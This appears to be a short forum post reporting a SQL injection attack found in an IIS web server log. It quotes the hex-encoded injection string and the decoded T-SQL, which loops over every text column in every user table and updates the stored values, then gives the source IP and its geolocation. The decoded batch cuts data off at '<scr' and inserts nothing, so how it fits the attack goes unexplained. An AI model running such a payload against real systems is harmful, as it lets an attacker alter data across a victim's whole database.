We had the same problem 25 September. I found sql-injection in IIS log:
DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C41524520405420564152434841522832353529220.............%20AS%20VARCHAR(4000));EXEC(@S)
I converted this text from HEX-format. LOOK:
DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=LEFT(CONVERT(VARCHAR(4000),['+@C+']),PATINDEX(''%<scr%'',CONVERT(VARCHAR(4000),['+@C+']))-1) WHERE PATINDEX(''%<scr%'',CONVERT(VARCHAR(4000),['+@C+']))>0') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
The attack was from 41.196.146.57
Information about this IP:
Hostname: host-41-196-146-57.static.link.com.eg
ISP: Link Egypt
Organization: Link Egypt
Proxy: None detected
Type: Unknown
Geo-Location Information
Country: Egypt
State/Region: 11
City: Cairo
Latitude: 30.05
Longitude: 31.25
This IP listed in many blacklists (for ex. dnsbl-3.uceprotect.net, cbl.abuseat.org )